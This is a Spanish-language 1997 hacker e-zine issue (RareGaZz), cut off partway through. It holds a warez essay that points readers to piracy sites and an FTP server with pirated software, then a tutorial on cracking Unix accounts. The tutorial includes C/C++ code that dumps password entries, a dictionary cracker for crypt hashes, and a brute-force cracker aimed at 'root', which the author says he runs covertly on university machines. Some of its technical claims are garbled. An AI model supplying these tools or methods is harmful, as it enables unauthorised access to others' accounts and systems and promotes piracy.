1/septiembre/1997
 <<::RareGaZz::>>
 "Mex & Co."
 En este numero:

 1.WareZ World
 2.Cracking cualquier sistema UNIX
 3.Como destruir a la competencia
 4.Los secretos del Carding!
 5.Phreaking & Hacking
 6.Los Hackers de las Macintosh
 7.Los malos de CYBERsitter
 8.Surfeo de Puertos
 9.Denial of Service -una introduccion-
 10.L3TZ HACK! "Low Fat"
 11.B00/\/\3R4/\/G
 12.NotiLOONS

 La Informacion que en este numero aparece *puede* servir
 para causar dao a una compaia o sistema y nadie de los
 que colaboran y/o editan  esta revista debe ser sealado
 como responsable. No respondemos chipote con sangre...  

 Design: Swoish
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Mr.X - RareTrip - ServerHacker - GuyBrush - Azumlord - LePompeItor - KillerBot
                 CrackSmoker - Swoish - Groovy - Nopal Picudo
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   *  http://www.geocities.com/Baja/4426  *
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                      Para contactar a RareGaZz via email:
                              RAREGAZZ@BIGFOOT.COM

  opcionalmente y dependiendo del mensaje puedes encriptarlo con esta llave

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3

mQENAzPMAlMAAAEIAMZQzI19DkA4QyK80OIExuCrZhp840Qn33nMC1laDoMAFPdU
M/eXfxWnGb5cl0JX4UsmqYhH06w6Eh7LKN3M8uihxl7grSqyrK0kWheDpCS2gTCV
qoD8FM5sjQon/vDtc0rMy3qm9JUSKEEiN9NiAlT4Ppa5Ms5rFxT8VAxRJ6PYuh99
3jvDGhjMmKsNatv3UKiNiztfOtfP+FzO/NouPpUh38q2/OryHIgBsoGSIKJjWwHw
jhsj0PHl2cHoRsYWJhFCfAHFcQ29jiU17JFItxvZ8klEgPS/jRphpi93ICJ1pWq7
2TSZ2Y+fH4LBlRgGZ/pmkrtAahP7rjA7ZhGTxN0ABRG0KVJhcmVHYVp6IDIwNDgg
Qml0cyA8UkFSRUdBWlpAQklHRk9PVC5DT00+
=e/tl
-----END PGP PUBLIC KEY BLOCK-----

                           "  Viva Mejicouu !!! "
                                       -Inversionista Extranjero

                   " Whats the buzz? tell what's happening "
                                       -Jesucristo super estrella

" Ella se estrello con el, en una exposicion de arte. Por el golpe, su celular
 se estropeo.  Se enamoraron y  se  fueron a  vivir juntos.  Pero  el jamas le
 perdono  que ella  precisamente  le hubiera  daado su  telefono. Nunca se lo
 perdono. Ni hoy, que vive solo. http://members..tripod.com/~fab/fab "


[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
                INTRO - INTRO - INTRO - INTRO - INTRO - INTRO 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

 Joh, Joh, Joh - Es navidad de nuevo en internet y este ao te amanecio otro
 nuevo numero de RareGaZz bajo tu webpage favorita. Seguramente te habras
 portado excelente como para estar leyendo este zine desde el comfort de tu
 computadora en cualquier parte del mundo.

 Muchas cosas nuevas por 'aca en el Polo Norte venados vienen y venados van
 pero el trineo sigue jalando para repartir juguetes a todos los aficionados
 al hacking y otras terminantes en "king" como Phreaking & Cracking que hablan
 o entienden el lenguaje preferido de los dioses ... espaol.

 Desesperado por que santa no llega? Pues dirigite a su escondite secreto en
 www.geocities.com/Baja/4426 para ver a los duendes trabajar consiguiendo
 software y links nuevos para tu placer y satisfaccion personal.

 Bueno es hora de abrir el viejo saco de sorpresas y poner a tu disposicion
 todo el contenido para tu deleite intelectual y emocional. Recuerda que si
 te portas bien pronto habra regalos de nuevo. Portate mal y tendras que
 esperar otro mes para que santa te visite de nuevo :-)

 Santa Claus alias raretrip.
 @@@@@@@@@@@@@@@@@@@@@@@@@@@

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
             Este texto debera ser leido usando un editor MSDOS 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                               = WareZ World =
                         por KillerBot para RareGaZz

 Quizas algunos no saben lo que es o significa el warez ni sus principios
 o razon de existir, aunque estoy familiarizado con algunos grupos de warez
 no por que escriba este texto quiero decir que se todo sobre este modo de
 vida. Simplemente es mi opinion personal y asi debe ser tomada.

 El warez existe desde los principios de la informatica actual cuando
 empezaron a aparecer productos de software que se comercializaban para
 generar ingresos economicos a una persona o compaia. El boom o lo que
 desato al mundo warez fueron las BBS a principios del ao 1985 con
 velocidades maximas de 2400bps la mayoria pero tambien existian pocas
 (por el carding) con soporte hasta de 9600bps. La velocidad de aquel entonces
 era suficiente, aun no existian los programas de seis u ocho megas que
 existen ahora. Basicamente el "warez" era codigo fuente de Cobol, Basic y
 pequeos programas compilados de 300k a 500k

 Con el avance de las computadoras y el desarrollo rapido de la industria del
 software se necesitaba una ley que prohibiera el copiado y distribucion de
 codigo fuente o compilado para proteger los derechos de autor o los ingresos
 de la compaia. Aqui en Mexico esta ley se creo y se hecho a funcionar hace
 poco tiempo pero en los estados unidos fue aprox. en 1987 cuando la ley
 entro en vigor. Esto solo significo una cosa: lo que haciamos en las BBS como
 "El escondite de BatMan" y "El agujero negro" en El paso Texas se convirtio
 en algo ilegal. Pronto desaparecieron estas BBS con cargos legales en su
 contra y la confiscacion del equipo. Los SysOps de estas bbs y los que
 ayudabamos a mantenerla con el mejor software que habia eramos apenas chicos
 de 16 a 17 aos...era 1988...en Texas.

 Un poco asustado yo me retire del mundo warez al ver como mis mejores amigos
 y los sysops de las bbs que frecuentaba eran sometidos a penas como servicio
 social y multas. Se hablaba de que el mundo warez jamas volveria a surgir.
 Sabiamos que era el fin, el grand finale del imperio que formaron las bbs
 contra compaias transnacionales.

 Es verdad que el mundo warez aqui permanecio callado como 2 o 3 aos, el
 unico intercambio de software pirata era con conocidos y por medio de
 diskettes y eso disminuia gracias a la cobertura amarillista de la prensa
 en esos aos sobre los virus informaticos. Muchos de nosotros tuvimos que
 caer en el infortunio de ir a una tienda de software a comprar, repito,
 comprar! software a pesar de habernos mal acostumbrado por tantos aos...

                                    Internet

 Tenia 18 aos cuando escuche y comprendi esa palabra por la boca de un
 profesor de mi prepa ya en Mexico. Por suerte conocia a un compaero  que
 tenia un login y password en el sistema internet de una escuela de ingenieria
 y empezamos a ver que hacia X comando y luego este otro hasta que pude ver en
 UNIX el regreso del mundo warez que ya casi habia olvidado a pesar de que en
 El Paso seguian los arrestos. Con Internet y UNIX llego FTP y esa herramienta
 fue el resurgimiento del mundo warez mundial ya no solamente local como lo
 fueron las BBS. Era la oportunidad para el mundo warez de surgir mundialmente
 y no pensabamos dejarla pasar.

                            What's wrong with Warez ?

 Que hay de malo con el warez? NADA. Absolutamente nada, es mas creo que es
 un servicio a la comunidad de estudiantes del mundo entero. Si eres un
 profesional que usas un programa warez para ganar dinero...pudrete en el
 infierno. El mayor logro del warez es brindar las herramientas necesarias
 para un buen trabajo universitario [ o de cualquier nivel ] a personas sin
 los ingresos necesarios para comprar 9 diskettes a 200 dolares!

 El warez d00d tambien debe tener valores. No podria yo distribuir un programa
 que vale el dinero que cuesta por que entonces estaria haciendo algo lame.
 Pero  como saber si el software vale lo que pide ? Simple, si el programa
 lo escribio una compaia grande como Oracle o Microsoft entonces copy tha'
 motha fucker! pero si el programa fue el esfuerzo de un programador y pide
 de 20 a 25 dolares por el entonces por que esforzarnos en copiarlo? Una copia
 original de un programa deberia costar entre 10 y 15 dolares por persona pero
 el costo de distribucion, paqueteria y demas aumenta el precio unos 10
 dolares mas pero no 50! Los mejores programadores han dado su software GRATIS
 solo vean a Mosaic el primer navegador de la red 100% gratuito, pero llego
 Netscape y Microsoft y comenzo la carrera capitalista.

 Tengo entendido que el Microsoft Office 97 ya esta en algunos ftp's en
 internet. Magnifico. Seguramente ayudara a muchas personas con su trabajo
 sin vaciarles el bolsillo. Esta es mi vision de los programas "piratas" que
 son la oveja negra y descarriada del Tio Sam y Mr.Gates. Si no les gustaria
 ver su programa accesible a cualquier persona en un ftp anonimo la solucion
 no es un virus, tampoco candados o claves (para eso hay crackers), la unica
 solucion permanente y efectiva es hacer FREEWARE!

 Sitios donde puedes conseguir WareZ (hot spots):

 Los mejores 50 sitios WareZ
 http://www.absoluteaccess.com/wareznet/index.htm

 Express's WareZ Main Page
 http://www.icwater.com/express/main.htm

 Rastastugan Password Appz: need
 http://hem2.passagen.se/joppe666/INDE.HTM
 -Norton antivirus
 -Kais PowerGoo
 -Kais Powertools
 -y 256 programas mas!

 Lamer''S WareZ Direct Download
 http://pages.infinit.net/atix/lame/apps.htm


 Por FTP:
 148.202.33.10   -  Universidad de Guadalajara
 /pub/incoming
 -Norton Utilities ( 7 discos )
 -Mucho Warez!

 [ En el sitio FTP de la universidad de G. tambien encontraran un directorio
   con la letra de las canciones de sus grupos favoritos. Tengo que decirles
   que quede muy impresionado cuando encontre la letra de todos los albums que
   ha lanzado PIXIES asi como NIRVANA. No se pierdan la oportunidad de tener
   la letra de sus canciones favoritas y visiten el directorio:
   /pub/canciones/letras
   y si quieren la letra de Nirvana
   /pub/canciones/letras/n/nirvana
   o la de Pixies
   /pub/canciones/letras/p/pixies
   Tambien hay sitios donde pueden conseguir la musica en formato .au uno de
   estos es: http://alpes.eurecom.fr/~egal/songs/
   Si quieren checar calidad: http://alpes.eurecom.fr/~egal/songs/Pixies/
   para descomprimir los archivos necesitaran www.winzip.com y para escuchar
   la musica algun buen editor de archivos (.au) como Cool Edit para aumentar
   la calidad del archivo a estereo y reducir la cantidad de ruido.  ]

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
          Se egoista y comparte tus textos unicamente con RareGaZz 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

Ŀ
               COMO CRACKER CUALQUIER SISTEMA BASADO EN UNIX               
                            (Conceptos basicos)                            
Ĵ
                               Por: Guybrush                               
Ĵ
                        E-Mail: guybrush@axis.org                          



Ŀ
                                  INDICE                                   


        0-Introduccion

        1-Porque es importante conocer el Unix?

        2-Porque es facil cracker un sistema Unix?

        3-Capturando el fichero passwd
           3.1-Unix
           3.2-Otros sistemas derivados

        4-Es posible desencriptar un password?

        5-Para que sirven los famosos 'diccionarios'?

        6-Como averiguar password con diccionarios
          6.1-Un programa ejemplo
          6.2-Generadores de palabras

        7-Cuentas Unix por defecto

        8-Despedida


Ŀ
                             0-INTRODUCCION                                


No voy a contaros toda la historia del Unix ya que ademas de ser aburrida,
imagino que estareis hartos de leerla.

Simplemente quiero decir que este es un documento bastante basico sobre
seguridad en Unix, pero que viene muy bien sobre todo a la gente que estudia
o trabaja en alguna Universidad o cualquier otro centro y tiene acceso a un
shell del servidor.

Tambien me gustaria que si alguien tiene dudas sobre lo que aqui escribo, o
cualquier otra cosa, me mande un e-mail.


Ŀ
                  1-POR QUE ES IMPORTANTE CONOCER UNIX?                   


Unix es un sistema operativo multitarea y multiusuario, y que ademas, lleva
muchos aos funcionando como tal. Aunque con la aparicion del Windows NT
(aparentemente bastante seguro, aunque con muchos bugs  :) - pero eso es otro
tema) este decreciendo el numero de empresas que usan Unix, sigue siendo hoy
en dia uno de los sistemas operativo mas 'seguros' que existen. Por lo que
muchisimas empresas (y sobre todo Universidades) lo usan. Ademas es mas facil
hackear desde un sistema Unix que desde Windows.

Como podemos nosotros hackear desde un Unix (o derivado de el)? Debemos
disponer de una cuenta shell (que nos la debe de dar nuestro proveedor de
Internet) o bien accediendo a Internet mediante Linux. Pero esto lo veremos
en otras revistas.

Ŀ
              2-POR QUE ES FACIL CRACKEAR UN SISTEMA UNIX?                


Los que inventaron Unix crearon un sistema bastante seguro, pero no perfecto.
Todos los sistemas tienen bugs, y a pesar de que en cada nueva version hay
menos agujeros, sigue siendo imperfecto. Hay algunos 'fallos' en el diseo
del sistema que un programador muy experimentado podria aprovechar. Por
ejemplo: un usuario no puede crear un directorio. No tiene poermiso para ello.
Por lo que cuando hacemos un mkdir, le pasamos el control (por milesimas de
segundo) a root, que es el que se encarga de crearlo y luego devolvernos el
control. Imagina lo que ocurriria si fueramos capaces de causar una inte-
rrupcion en ese pequeo tiempo en que root tiene el control!! Automaticamente
pasariamos a ser los dueos y seores del sistema. (lo siento Rabine, no me he
podido resistir)  :)

Pero yo no voy a ensear ningun bug, ni tampoco programacion avanzada. Solo
voy a mostrar una forma muy simple de conseguir cuentas. Y si el administrador
es un poco lamer incluso podremos ser root.

El sistema Unix tiene un metodo de cifrado muy bueno, pero guarda la informa-
cion de todos los usuario junto con sus password (logicamente cifrados) en
un fichero. El fichero passwd.


Ŀ
                     3-CAPTURANDO EL FICHERO PASSWD                        

Ŀ
3.1-UNIX


En Unix es muy sencillo leer este fichero, ya que es accesible a cualquier
usuario. Se encuentra en el directorio /etc. Y tiene la siguiente forma:

paco:ZbkEM2vQVowcw:10013:202:PACO SANCHEZ PENADES:/home/paco:/bin/ksh
elisa:GeJuwMrBVa6mg:10016:202:ELISA J. CRIVILLES:/home/elisa:/bin/ksh
pepe:GezuA6krN/BsE:10019:202:PEPE PEALVER BENAVENT:/home/pepe:/bin/ksh
juan:Ge7EPYLjRYX9I:10022:202:JUAN BELLIDO IBORRA:/home/juan:/bin/ksh

Que significa todo esto? Veamos. el fichero contiene estos datos:

1:2:3:4:5:6:7

donde:

        1) nombre del usuario
        2) password encriptado
        3) numero UID (identificacion de usuario)
        4) numero GID (identificacion de grupo)
        5) datos del usuario
        6) directorio de trabajo
        7) directorio del shell

Ŀ
3.2-OTROS SISTEMAS DERIVADOS


No todos los sistemas guardan el fichero passwd en /etc. He aqui una lista de
varios sistemas y sus directorios:

AIX 3                 /etc/security/passwd
A/UX 3.0s             /tcb/files/auth/?
BSD4.3-Reno           /etc/master.passwd
ConvexOS 10           /etc/shadpw
ConvexOS 11           /etc/shadow
DG/UX                 /etc/tcb/aa/user/
EP/IX                 /etc/shadow
HP-UX                 /.secure/etc/passwd
IRIX 5                /etc/shadow
Linux 1.1             /etc/shadow
OSF/1                 /etc/passwd[.dir|.pag]
SCO Unix #.2.x        /tcb/auth/files/<first letter
SunOS4.1+c2           /etc/security/passwd.adjunct
SunOS 5.0             /etc/shadow
System V Release 4.0  /etc/shadow
System V Release 4.2  /etc/security/* database
Ultrix 4              /etc/auth[.dir|.pag]
UNICOS                /etc/udb

(lista sacada de los FAQ de alt.2600)

En muchos de estos sistemas, el directorio que contiene el fichero passwd no
es de acceso a usuarios que no sean root, por lo que no podemos ver el conte-
nido del directorio. Pero esto no es ningun impedimento para nosotros. Aqui
posteo un pequeo programa con el que reconstruimos el fichero passwd, a pesar
de que no podamos acceder a el:

------------------------ cortar por aqui -------------------------------------
// Programa que reconstruye el fichero passwd.
// Copyright (c) Guybrush
// Compilar en c++ y redireccionar la salida a un fichero
// cc cogerPass.cc -o cogerPass > fichero


#include <iostream.h>
#include <pwd.h>


struct passwd *pw;


main()
{
   while ((pw = getpwent()) != NULL)
   {
      cout << pw->pw_name;
      cout << ":" << pw->pw_passwd;
      cout << ":" << pw->pw_uid;
      cout << ":" << pw->pw_gid;
      cout << ":" << pw->pw_gecos;
      cout << ":" << pw->pw_dir;
      cout << ":" << pw->pw_shell << endl;
   }

   endpwent();
}
------------------------ cortar por aqui -------------------------------------

Ŀ
                  4-ES POSIBLE DESENCRIPTAR UN PASSWORD?                  


Ningun cifrado es indescrifrable, pero hay algunos que con los ordenadores
de hoy en dia se tardarian muchos aos en poder descifrar, como es el caso
del cifrado de Unix.

Cuando creamos un password, Unix aplica sobre el el algoritmo de cifrado lla-
mado DES, el cual era un algoritmo practicamente indescifrable cuando se ideo,
pero que con el paso del tiempo y la tremenda evolucion de la tecnologia, cada
dia se hace mas posible su desencriptado, dada la velocidad de los ordenadores
actuales. Pero la cosa no es tan facil ya que Unix no aplica este algoritmo
una sola vez, sino que lo aplica 25 veces. Una vez que encripta la palabra, la
vuelve a encriptar, y asi sucesivamente, hasta 25. Y por si fuera poco, a la
palabra resultante le aade dos caracteres mas, llamados 'salt', que provienen
de la hora de encriptado. Es decir, si nosotros encriptamos la palabra 'pepe'
a las 20:00 y la volvemos a encriptar a las 20:05 (por ejemplo), la palabra
cifrada resultante no es la misma.

Cada palabra tiene 4.096 formas distintas!! de desencriptarse. Por lo que
si has pensado alguna vez en descifrar una palabra ... ni lo suees (por lo
menos con los ordenadores de hoy en dia). Es practicamente imposible (se tar-
daria una eternidad). Por eso recurrimos a los diccionarios...

Ŀ
                5-PARA QUE SIRVEN LOS FAMOSOS DICCIONARIOS?               


Como hemos visto, no podemos descifrar un password, pero si que podemos cifrar
palabras con todos los salt posibles y compararlas con la que ya tenemos ci-
frada. Por ejemplo, ciframos la palabra 'arbol', le quitamos el salt y le aa-
dimos todas las combinaciones. Luego las comparamos con el password ya cifrado
y si son iguales ... ya tenemos la clave!. Pero tampoco es cuestion de comen-
zar a introducir palabras por teclado ya que se nos haria eterno y muy engo-
rroso, por lo que primero podemos construir un diccionario (hay muchos en
Internet), el cual le pasaremos como parametro al programa comparador que ten-
gamos. Y el se encargara de realizar todo el trabajo.

Ŀ
                6-COMO AVERIGUAR PASSWORD CON DICCIONARIOS?               

Ŀ
6.1-UN PROGRAMA EJEMPLO


He aqui un pequeo programa que encripta y comprara palabras. Es de lo mas
basico, por lo que no deberias tener ningun problema en entenderlo. Tambien
existen otros que funcionan bajo DOS y que funcionan mas rapido como son:
brute, jack crack, john the ripper, ... Te recomiendo que los consigas.

este programa comprueba que el usuario exista en esa maquina y captura el
mismo la palabra encriptada. Si quieres puedes modificarlo para que le puedas
pasar como parametro la palabra encriptada y que trabaje en tu misma casa.
Tambien acepta cualquier texto ya que el mismo se encarga de deshechar los
caracteres especiales:


------------------------ cortar por aqui -------------------------------------
// Programa que lee palabras de cualquier diccionario o texto y despues de
// encriptarlas las compara.
// Copyright (c) Guybrush


#include <stdio.h>
#include <pwd.h>


char cadena[30];
char clave[30];

struct passwd *pwd;


int desencripta(char *clave, char *archivo)
{
   FILE *fichero;

   char *crypt(), *resp;
   int cont;

   if ((fichero = fopen(archivo,"r")) == NULL)
   {
      printf("\nError al abrir diccionario\n");
      exit(0);
   }

   while (!feof(fichero))
   {
      cont = 0;

      do
      {
         cadena[cont] = fgetc(fichero);
         cont++;
      } while ((cadena[cont-1] != '\n') && (cadena[cont-1] != ' ') &&
               (cadena[cont-1] != ',') && (cadena[cont-1] != '.') &&
               (cadena[cont-1] != ';') && (cadena[cont-1] != ':') &&
               (!feof(fichero)));

      cadena[cont-1] = '\x0';

      resp = crypt(cadena,clave);

      if (!strcmp(resp,clave))
      {
         printf("\a\n\n\n ==> El password es : %s <==\n\n\n",cadena);
         fclose(fichero);

         return 1;
      }
   }

   fclose(fichero);

   return 0;
}


main(int argc, char **argv)
{
   int respuesta;
   char clave[15];

   if (argc == 3)
   {
      if (!(pwd = getpwnam(argv[1])))
      {
         printf("\nUsuario desconocido.\n\n");
         exit(-1);
      }

      strcpy(clave,pwd->pw_passwd);

      endpwent();

      printf("\n\nBuscando palabras en el diccionario ...\n\n");

      respuesta = desencripta(clave,argv[2]);

      if (respuesta != 1)
         printf("\n\n\nPalabra no encontrada en el diccionario.\n\n\n");
   }
   else
      printf("\n\nUsar: %s <usuario> <diccionario donde buscar>\n\n",argv[0]);
}
------------------------ cortar por aqui -------------------------------------

Ŀ
6.2-GENERADORES DE PALABRAS


Podemos disear tambien un programa que genere todas las combinaciones de
palabras y/o numeros. Esto es muy util para password con menos de 6 caracteres
ya que con 5 ya tarda una eternidad. Ademas hemos de tener en cuenta que un
password admite mayusculas, numeros y caracteres especiales.

He aqui un pequeo programa el cual uso para dejar residente en la Universidad
ya que esta esta en funcionamiento las 24 horas del dia. Aunque tarde semanas
o meses en encontrar el password, como no esta en mi casa ...    :)

------------------------ cortar por aqui -------------------------------------
// Programa que debemos dejar residente con 'nohup' y que busca todas las
// posibles combinaciones para desencriptar un password. Tambien controla
// las interrupciones y hace copias de seguridad ante un kill y cada cierto
// tiempo para poder continuar posteriormente por donde se quedo.
// Copyright (c) Guybrush

#include <stdio.h>
#include <string.h>
#include <pwd.h>
#include <signal.h>
#include <sys/types.h>

#define USUARIO "root"   // nombre del usuario
#define DATOS "datos"    // fichero temporal donde guarda datos ante un kill
#define SALIDA "salida"  // donde graba el password en caso de encontrarlo
/*#define CADENA "abcdefghijklmnopqrstuvwxyz"*/
#define CADENA "abcdefghijklmnopqrstuvwxyz0123456789"
/*#define CADENA "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"*/
/*#define CADENA "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ0123456789-"*/


struct {
   char c1[2];
   char c2[3];
   char c3[4];
   char c4[5];
   char c5[6];
   char c6[7];
   char c7[8];
   char c8[9];
} proceso;

struct passwd *pwd;


FILE *fichero;

double contador = 0;

main()
{
   void inicializar();
   void abandonar();
   void uno(), dos(), tres(), cuatro(), cinco(), seis(), siete(), ocho();

   char cadena[30];
   int longitud = strlen(CADENA);
   char clave[15];

   signal(SIGTERM,abandonar);

   if (!(pwd = getpwnam(USUARIO)))
   {
      printf("\nUsuario desconocido.\n\n");
      exit(-1);
   }

   strcpy(clave,pwd->pw_passwd);

   endpwent();

   strcpy(cadena,CADENA);

   inicializar(cadena);

   uno(longitud, cadena, clave);
   dos(longitud, cadena, clave);
   tres(longitud, cadena, clave);
   cuatro(longitud, cadena, clave);
   cinco(longitud, cadena, clave);
   seis(longitud, cadena, clave);
   siete(longitud, cadena, clave);
   ocho(longitud, cadena, clave);

   abandonar();
}


void inicializar(char *cadena)
{
   int cont;

   if ((fichero = fopen(DATOS,"r")) != NULL)
   {
      fread(&proceso,sizeof(proceso),1,fichero);
      fclose(fichero);
   }
   else
   {
      if ((fichero = fopen(DATOS,"w")) == NULL)
      {
  printf("\nError al crear fichero.\n\n");
  exit(-1);
      }

      proceso.c1[0] = cadena[0];
      for (cont = 0; cont < 2; cont++)
  proceso.c2[cont] = cadena[0];
      for (cont = 0; cont < 3; cont++)
  proceso.c3[cont] = cadena[0];
      for (cont = 0; cont < 4; cont++)
  proceso.c4[cont] = cadena[0];
      for (cont = 0; cont < 5; cont++)
  proceso.c5[cont] = cadena[0];
      for (cont = 0; cont < 6; cont++)
  proceso.c6[cont] = cadena[0];
      for (cont = 0; cont < 7; cont++)
  proceso.c7[cont] = cadena[0];
      for (cont = 0; cont < 8; cont++)
  proceso.c8[cont] = cadena[0];

      proceso.c1[1] = '\n';
      proceso.c2[2] = '\n';
      proceso.c3[3] = '\n';
      proceso.c4[4] = '\n';
      proceso.c5[5] = '\n';
      proceso.c6[6] = '\n';
      proceso.c7[7] = '\n';
      proceso.c8[8] = '\n';

      fwrite(&proceso,sizeof(proceso),1,fichero);
      fclose(fichero);
   }

   proceso.c1[1] = '\x0';
   proceso.c2[2] = '\x0';
   proceso.c3[3] = '\x0';
   proceso.c4[4] = '\x0';
   proceso.c5[5] = '\x0';
   proceso.c6[6] = '\x0';
   proceso.c7[7] = '\x0';
   proceso.c8[8] = '\x0';

   return;
}


void abandonar()
{
   if ((fichero = fopen(DATOS,"w")) == NULL)
   {
      printf("\nError al crear fichero.\n\n");
      exit(-1);
   }

   proceso.c1[1] = '\n';
   proceso.c2[2] = '\n';
   proceso.c3[3] = '\n';
   proceso.c4[4] = '\n';
   proceso.c5[5] = '\n';
   proceso.c6[6] = '\n';
   proceso.c7[7] = '\n';
   proceso.c8[8] = '\n';

   fwrite(&proceso,sizeof(proceso),1,fichero);
   fclose(fichero);
   exit(-1);
}


void copia()
{
   if ((fichero = fopen(DATOS,"w")) == NULL)
   {
      printf("\nError al crear fichero.\n\n");
      exit(-1);
   }

   proceso.c1[1] = '\n';
   proceso.c2[2] = '\n';
   proceso.c3[3] = '\n';
   proceso.c4[4] = '\n';
   proceso.c5[5] = '\n';
   proceso.c6[6] = '\n';
   proceso.c7[7] = '\n';
   proceso.c8[8] = '\n';

   fwrite(&proceso,sizeof(proceso),1,fichero);
   fclose(fichero);

   return;
}


int busca(int longitud, char *cadena, char caracter)
{
   int posicion;

   for (posicion = 0; posicion < longitud; posicion++)
      if (caracter == cadena[posicion])
  return posicion;

   return 0;
}


void encontrado(char *palabra)
{
   FILE *fichero2;

   printf("\a\a\a");

   if ((fichero2 = fopen(SALIDA,"w")) == NULL)
   {
      printf("\nError al crear fichero.\n\nClave : %s",palabra);
      exit(-1);
   }

   fprintf(fichero2,palabra);
   fclose(fichero2);

   return;
}


void uno(int longitud, char *cadena, char *clave)
{
   void encontrado();
   void copia();

   char *crypt(), *desencripta;

   int cont;
   int p0 = busca(longitud,cadena,proceso.c1[0]);

   for (cont = p0; cont != longitud; cont++)
   {
      proceso.c1[0] = cadena[cont];
      desencripta = crypt(proceso.c1,clave);
      if (!strcmp(desencripta,clave))
      {
  encontrado(proceso.c1);
  abandonar();
      }

      if ((contador++) == 60000)
      {
         copia();
         contador = 0;
      }
   }

   return;
}


void dos(int longitud, char *cadena, char *clave)
{
   void encontrado();
   void copia();

   char *crypt(), *desencripta;

   int cont, cont2;
   int p0 = busca(longitud,cadena,proceso.c2[0]);
   int p1 = busca(longitud,cadena,proceso.c2[1]);

   for (cont = p0; cont < longitud; cont++)
   {
      proceso.c2[0] = cadena[cont];

      for (cont2 = p1; cont2 < longitud; cont2++)
      {
  proceso.c2[1] = cadena[cont2];
  desencripta = crypt(proceso.c2,clave);
  if (!strcmp(desencripta,clave))
  {
     encontrado(proceso.c2);
     abandonar();
  }

         if ((contador++) == 60000)
         {
            copia();
            contador = 0;
         }
      }

      p1 = 0;
   }

   return;
}


void tres(int longitud, char *cadena, char *clave)
{
   void encontrado();
   void copia();

   char *crypt(), *desencripta;

   int cont, cont2, cont3;
   int p0 = busca(longitud,cadena,proceso.c3[0]);
   int p1 = busca(longitud,cadena,proceso.c3[1]);
   int p2 = busca(longitud,cadena,proceso.c3[2]);

   for (cont = p0; cont < longitud; cont++)
   {
      proceso.c3[0] = cadena[cont];

      for (cont2 = p1; cont2 < longitud; cont2++)
      {
  proceso.c3[1] = cadena[cont2];

  for (cont3 = p2; cont3 < longitud; cont3++)
  {
     proceso.c3[2] = cadena[cont3];
     desencripta = crypt(proceso.c3,clave);
     if (!strcmp(desencripta,clave))
     {
        encontrado(proceso.c3);
        abandonar();
     }

            if ((contador++) == 60000)
            {
               copia();
               contador = 0;
            }
  }

  p2 = 0;
      }

      p1 = 0;
   }

   return;
}


void cuatro(int longitud, char *cadena, char *clave)
{
   void encontrado();
   void copia();

   char *crypt(), *desencripta;

   int cont, cont2, cont3, cont4;
   int p0 = busca(longitud,cadena,proceso.c4[0]);
   int p1 = busca(longitud,cadena,proceso.c4[1]);
   int p2 = busca(longitud,cadena,proceso.c4[2]);
   int p3 = busca(longitud,cadena,proceso.c4[3]);

   for (cont = p0; cont < longitud; cont++)
   {
      proceso.c4[0] = cadena[cont];

      for (cont2 = p1; cont2 < longitud; cont2++)
      {
  proceso.c4[1] = cadena[cont2];

  for (cont3 = p2; cont3 < longitud; cont3++)
  {
     proceso.c4[2] = cadena[cont3];

     for (cont4 = p3; cont4 < longitud; cont4++)
     {
        proceso.c4[3] = cadena[cont4];
        desencripta = crypt(proceso.c4,clave);
        if (!strcmp(desencripta,clave))
        {
    encontrado(proceso.c4);
    abandonar();
        }

               if ((contador++) == 60000)
               {
                  copia();
                  contador = 0;
               }
     }

     p3 = 0;
  }

  p2 = 0;
      }

      p1 = 0;
   }

   return;
}


void cinco(int longitud, char *cadena, char *clave)
{
   void encontrado();
   void copia();

   char *crypt(), *desencripta;

   int cont, cont2, cont3, cont4, cont5;
   int p0 = busca(longitud,cadena,proceso.c5[0]);
   int p1 = busca(longitud,cadena,proceso.c5[1]);
   int p2 = busca(longitud,cadena,proceso.c5[2]);
   int p3 = busca(longitud,cadena,proceso.c5[3]);
   int p4 = busca(longitud,cadena,proceso.c5[4]);

   for (cont = p0; cont < longitud; cont++)
   {
      proceso.c5[0] = cadena[cont];

      for (cont2 = p1; cont2 < longitud; cont2++)
      {
         proceso.c5[1] = cadena[cont2];

         for (cont3 = p2; cont3 < longitud; cont3++)
         {
            proceso.c5[2] = cadena[cont3];

            for (cont4 = p3; cont4 < longitud; cont4++)
     {
        proceso.c5[3] = cadena[cont4];

        for (cont5 = p4; cont5 < longitud; cont5++)
               {
           proceso.c5[4] = cadena[cont5];
    desencripta = crypt(proceso.c5,clave);
    if (!strcmp(desencripta,clave))
    {
       encontrado(proceso.c5);
       abandonar();
    }

                  if ((contador++) == 60000)
                  {
                     copia();
                     contador = 0;
                  }
          }

          p4 = 0;
     }

     p3 = 0;
  }

  p2 = 0;
      }

      p1 = 0;
   }

   return;
}


void seis(int longitud, char *cadena, char *clave)
{
   void encontrado();
   void copia();

   char *crypt(), *desencripta;

   int cont, cont2, cont3, cont4, cont5, cont6;
   int p0 = busca(longitud,cadena,proceso.c6[0]);
   int p1 = busca(longitud,cadena,proceso.c6[1]);
   int p2 = busca(longitud,cadena,proceso.c6[2]);
